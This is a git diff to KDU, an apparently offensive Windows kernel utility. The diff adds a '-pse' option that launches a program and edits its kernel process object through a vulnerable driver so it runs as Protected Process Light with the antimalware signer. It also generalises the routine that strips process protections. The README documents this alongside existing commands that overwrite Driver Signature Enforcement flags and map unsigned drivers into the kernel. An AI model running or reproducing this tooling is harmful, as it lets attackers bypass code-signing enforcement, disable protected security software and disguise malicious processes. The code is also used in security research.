diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..0baa07b --- /dev/null +++ b/.gitignore @@ -0,0 +1,3 @@ +Source/**/output +.vs +Source/Hamakaze/shellstager.lst diff --git a/README.md b/README.md index eedc948..cbfa5ae 100644 --- a/README.md +++ b/README.md @@ -23,12 +23,14 @@ It features: ###### KDU -diag ###### KDU -prv ProviderID ###### KDU -ps ProcessID +###### KDU -pse Commandline ###### KDU -dse value ###### KDU -map filename * -list - list currently available providers; * -diag - run system diagnostic for troubleshooting; * -prv - optional, select vulnerability driver provider; -* -ps - modify process object of given ProcessID; +* -ps - modify process object of given ProcessID, downgrading any protections; +* -pse - launch program as ProtectedProcessLight-AntiMalware (PPL); * -dse - write user defined value to the system DSE state flags; * -map - map driver to the kernel and execute it entry point, this command have dependencies listed below; * -scv version - optional, select shellcode version, default 1; @@ -44,6 +46,7 @@ Example: + kdu -prv 6 -scv 3 -drvn edrv -drvr e3600bl -map c:\install\e3600bl.sys + kdu -dse 0 + kdu -dse 6 ++ kdu -pse "C:\Windows\System32\notepad.exe C:\TEMP\words.txt" Run on Windows 10 20H2* diff --git a/Source/Hamakaze/main.cpp b/Source/Hamakaze/main.cpp index 09444e7..5d998fe 100644 --- a/Source/Hamakaze/main.cpp +++ b/Source/Hamakaze/main.cpp @@ -23,6 +23,7 @@ #define CMD_MAP L"-map" #define CMD_SCV L"-scv" #define CMD_PS L"-ps" +#define CMD_PSE L"-pse" #define CMD_DSE L"-dse" #define CMD_LIST L"-list" #define CMD_SI L"-diag" @@ -37,6 +38,7 @@ "kdu -list - list available providers\r\n"\ "kdu -diag - run system diagnostic for troubleshooting\r\n"\ "kdu -prv id - optional, sets provider id to be used with rest of commands, default 0\r\n"\ + "kdu -pse cmdline - Launch program as PPL\r\n"\ "kdu -ps pid - disable ProtectedProcess for given pid\r\n"\ "kdu -dse value - write user defined value to the system DSE state flags\r\n"\ "kdu -map filename - map driver to the kernel and execute it entry point, this command have dependencies listed below\r\n"\ @@ -46,6 +48,38 @@ #define T_PRNTDEFAULT "%s\r\n" +/* +* KDUProcessPSEObjectSwitch +* +* Purpose: +* +* Handle -pse switch. +* +*/ +INT KDUProcessPSEObjectSwitch( + _In_ ULONG HvciEnabled, + _In_ ULONG NtBuildNumber, + _In_ ULONG ProviderId, + _In_ LPWSTR CommandLine +) +{ + INT retVal = 0; + KDU_CONTEXT* provContext; + + provContext = KDUProviderCreate(ProviderId, + HvciEnabled, + NtBuildNumber, + KDU_SHELLCODE_NONE, + ActionTypeDKOM); + + if (provContext) { + retVal = KDURunCommandPPL(provContext, CommandLine); + KDUProviderRelease(provContext); + } + + return retVal; +} + /* * KDUProcessPSObjectSwitch * @@ -71,7 +105,7 @@ INT KDUProcessPSObjectSwitch( ActionTypeDKOM); if (provContext) { - retVal = KDUControlProcess(provContext, ProcessId); + retVal = KDUUnprotectProcess(provContext, ProcessId); KDUProviderRelease(provContext); } @@ -429,9 +463,19 @@ INT KDUProcessCommandLine( } } + else if (supGetCommandLineOption(CMD_PSE, + TRUE, + szParameter, + sizeof(szParameter) / sizeof(WCHAR), + NULL)) + { + retVal = KDUProcessPSEObjectSwitch(HvciEnabled, + NtBuildNumber, + providerId, + szParameter); + } - else - + else { // // Check if -ps specified. // @@ -455,6 +499,7 @@ INT KDUProcessCommandLine( // printf_s(T_PRNTDEFAULT, T_KDUUSAGE); } + } } while (FALSE); diff --git a/Source/Hamakaze/ps.cpp b/Source/Hamakaze/ps.cpp index 2d5ea85..5bc44d8 100644 --- a/Source/Hamakaze/ps.cpp +++ b/Source/Hamakaze/ps.cpp @@ -86,6 +86,85 @@ LPSTR KDUGetProtectionSignerAsString( return pStr; } +/* +* KDUControlProcess +* +* Purpose: +* +* Start a Process as PPL-Antimalware +* +*/ +BOOL KDURunCommandPPL( + _In_ PKDU_CONTEXT Context, + _In_ LPWSTR CommandLine) +{ + BOOL bResult = FALSE; + DWORD dwThreadResumeCount = 0; + + STARTUPINFO si; + PROCESS_INFORMATION pi; + + ZeroMemory(&si, sizeof(si)); + si.cb = sizeof(si); + ZeroMemory(&pi, sizeof(pi)); + + wprintf_s(L"[+] Creating Process '%s'\r\n", CommandLine); + + bResult = CreateProcess( + NULL, // No module name (use command line) + CommandLine, // Command line + NULL, // Process handle not inheritable + NULL, // Thread handle not inheritable + FALSE, // Set handle inheritance to FALSE + CREATE_SUSPENDED, // Create Process suspended so we can edit + // its protection level prior to starting + NULL, // Use parent's environment block + NULL, // Use parent's starting directory + &si, // Pointer to STARTUPINFO structure + &pi); // Pointer to PROCESS_INFORMATION structure + if (!bResult) { + printf("[!] Failed to create process: 0x%x\n", GetLastError()); + return bResult; + } + printf_s("[+] Created Process with PID %d\r\n", pi.dwProcessId); + + bResult = KDUControlProcess(Context, pi.dwProcessId, PsProtectedSignerAntimalware, PsProtectedTypeProtectedLight); + if (!bResult) { + printf("[!] Failed to set process as PPL: 0x%x\n", GetLastError()); + return bResult; + } + + dwThreadResumeCount = ResumeThread(pi.hThread); + if (dwThreadResumeCount != 1) { + printf("[!] Failed to resume process: %d | 0x%x\n", dwThreadResumeCount, GetLastError()); + return bResult; + } + + // Wait until child process exits. + WaitForSingleObject(pi.hProcess, INFINITE); + + // Close process and thread handles. + CloseHandle(pi.hProcess); + CloseHandle(pi.hThread); + + return bResult; +} + +/* +* KDUControlProcess +* +* Purpose: +* +* Modify process object to remove PsProtectedProcess access restrictions. +* +*/ +BOOL KDUUnprotectProcess( + _In_ PKDU_CONTEXT Context, + _In_ ULONG_PTR ProcessId) +{ + return KDUControlProcess(Context, ProcessId, PsProtectedSignerNone, PsProtectedTypeNone); +} + /* * KDUControlProcess * @@ -96,7 +175,9 @@ LPSTR KDUGetProtectionSignerAsString( */ BOOL KDUControlProcess( _In_ PKDU_CONTEXT Context, - _In_ ULONG_PTR ProcessId) + _In_ ULONG_PTR ProcessId, + _In_ PS_PROTECTED_SIGNER PsProtectionSigner, + _In_ PS_PROTECTED_TYPE PsProtectionType) { BOOL bResult = FALSE; ULONG Buffer; @@ -194,15 +275,15 @@ BOOL KDUControlProcess( PsProtection->Type, pStr); - printf_s("\tPsProtection->Audit: %lu\r\n", PsProtection->Audit); - pStr = KDUGetProtectionSignerAsString(PsProtection->Signer); printf_s("\tPsProtection->Signer: %lu (%s)\r\n", PsProtection->Signer, pStr); - PsProtection->Signer = PsProtectedSignerNone; - PsProtection->Type = PsProtectedTypeNone; + printf_s("\tPsProtection->Audit: %lu\r\n", PsProtection->Audit); + + PsProtection->Signer = PsProtectionSigner; + PsProtection->Type = PsProtectionType; PsProtection->Audit = 0; bResult = Context->Provider->Callbacks.WriteKernelVM(Context->DeviceHandle, diff --git a/Source/Hamakaze/ps.h b/Source/Hamakaze/ps.h index c84f63d..b60997c 100644 --- a/Source/Hamakaze/ps.h +++ b/Source/Hamakaze/ps.h @@ -30,6 +30,17 @@ #define EPROCESS_TO_PROTECTION(Object, PsProtectionOffset) ((ULONG_PTR)Object + (ULONG_PTR)PsProtectionOffset) -BOOL KDUControlProcess( +BOOL KDUUnprotectProcess( _In_ PKDU_CONTEXT Context, _In_ ULONG_PTR ProcessId); + +BOOL KDURunCommandPPL( + _In_ PKDU_CONTEXT Context, + _In_ LPWSTR CommandLine); + +BOOL KDUControlProcess( + _In_ PKDU_CONTEXT Context, + _In_ ULONG_PTR ProcessId, + _In_ PS_PROTECTED_SIGNER PsProtectionSigner, + _In_ PS_PROTECTED_TYPE PsProtectionType); +